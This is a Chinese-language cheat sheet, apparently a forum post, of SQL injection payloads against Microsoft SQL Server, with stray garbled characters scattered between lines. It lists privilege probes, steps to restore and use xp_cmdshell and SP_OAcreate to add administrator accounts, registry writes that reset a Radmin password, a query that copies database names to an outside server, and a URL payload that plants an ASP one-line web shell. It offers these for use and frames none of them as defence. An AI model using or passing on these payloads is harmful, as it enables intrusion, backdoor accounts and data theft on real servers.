阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
' B* q6 k/ a1 j- Qand 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

3 K& [9 j- W0 X) z* G0 B" C//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --


; B  Q' C+ q2 t数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
7 A4 }4 u$ R0 e+ f7 D
7 B) M9 d, g0 A  W搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

- o/ u5 d; O( Z" r爆用户名
and user>0
' and user>0 and ''='
, M( ^' x$ E9 O
检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
# X( D) K. P3 V# e( a( x( UAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
+ P# [, Z, X' F5 y' _5 b* jand exists (select * from sysobjects);--

检测是否支持多行
  T) w( @/ R# |7 j% X;declare @d int;--

恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

/ G+ U6 b2 n( {7 y2 j
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
//      执行命令
//-----------------------
首先开启沙盘模式：
$ p- o4 P& {* u( R4 nexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
% Q! X1 I1 |' z! R$ t( X$ c, c/ I
. Q6 ]5 \( d& U( u然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
3 g% }2 V5 K' t; R  I
' k6 q( Q# s* q  n执行命令
1 s0 v4 l; o& d3 y0 y- d1 Z3 ~;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
% U, g1 _* v. S3 g" ?: P: v9 ?
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在：
! ]- U) d+ Q* A/ whttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
2 ^  |! B- ]/ n: d) C' z6 @
2 ?5 u( N  X; }5 l写注册表
5 T5 N9 B  s! |7 eexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
. p9 w2 Q% `0 N+ A- w+ i& G) M$ V, B
% X) X' m, T8 B3 P7 tREG_SZ

读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
  s2 F% P" F: E
& R) g3 Q( f. `4 v; w* _读取目录内容
! A1 ?: Q1 B3 _7 Uexec master..xp_dirtree 'c:\winnt\system32\',1,1

! E+ f6 `, a  X" y5 J
数据库备份
backup database pubs to disk = 'c:\123.bak'
) X: F4 h0 V! e9 X5 t) R+ A8 l
//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
3 [, w6 _# d0 ^& B* ~( }- p% f( B, L


更改sa口令方法：用sql综合利用工具连接后，执行命令：
/ G4 t2 S" y" \exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,ptlove
/ d, x) w( K- N$ y# Bexec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句:
5 Y1 O  {3 y' l& s( l7 S- W1 q1 bexec sp_dropextendedproc 'xp_cmdshell'
; [8 j. F% W+ p. G0 j# ~6 d
! {1 A/ v' j: F% v! O* A2 i( t添加扩展存储过过程
+ R& x2 a/ e( T6 BEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public


- c& C% W5 X! _( @% Q停掉或激活某个服务。
8 R* ~" k' Z% B# B- l
exec master..xp_servicecontrol 'stop','schedule'
( O0 B" o/ z) F: a  K3 [exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

  M% h' V& K& Z. H) a只列某个目录下的子目录。
, J; l5 c2 o4 f5 d' n/ l9 Qxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
# ~, ]1 c8 M/ a' g7 i) i) [
dbo.xp_makecab
- S2 N; `3 G0 W, G1 d3 a/ K! \5 _8 n
将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
, k( L1 K8 N2 f5 s1 A'C:\Inetpub\wwwroot\SQLInject\login.asp',
8 _; G% _3 r( [. N! Y- Y0 z; V, N: a'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

6 b  \, |& z5 txp_terminate_process

停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
" p. R. K# z8 V8 r
; G# P$ l$ e% x- h: B% ^2 Y/ ^9 hxp_terminate_process 2484

# h3 P# U7 s& v5 Y  ~5 H3 yxp_unpackcab

解开压缩档。
) P! R+ W/ E3 V9 E- ?+ h: H
7 Z+ @2 P, z7 T( U# ?0 j8 Z1 Zxp_unpackcab 'c:\test.cab','c:\temp',1


# \1 y) |, ^( v8 E" R6 k9 K2 k" j5 h某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
/ j  U, e7 f7 s/ V0 E" p  d+ Z0 _
" g3 ]6 p% i$ a0 M# ucreate database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

( N8 Z) ~# ^$ E$ C//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
$ p9 {+ ~1 d* C
8 ]6 @) H% x6 l# W1 {% K+ @
7 }' R4 i( _0 z, U$ d+ b/ e//在Master中创建表，看看权限怎样
$ u( o1 t0 X$ QCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
, B% X6 P% o+ E8 S% Z' n; Q
用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

//更新表内容
+ U0 Z( a  J5 a2 n% FUpdate films SET kind = 'Dramatic' Where id = 123
! W# D3 J) K8 f6 \' c$ G- c
8 |( H, w! z: J" T$ @4 V//删除内容
6 k% C+ D0 }) n6 n0 k4 Q. jdelete from table_name where Stockid = 3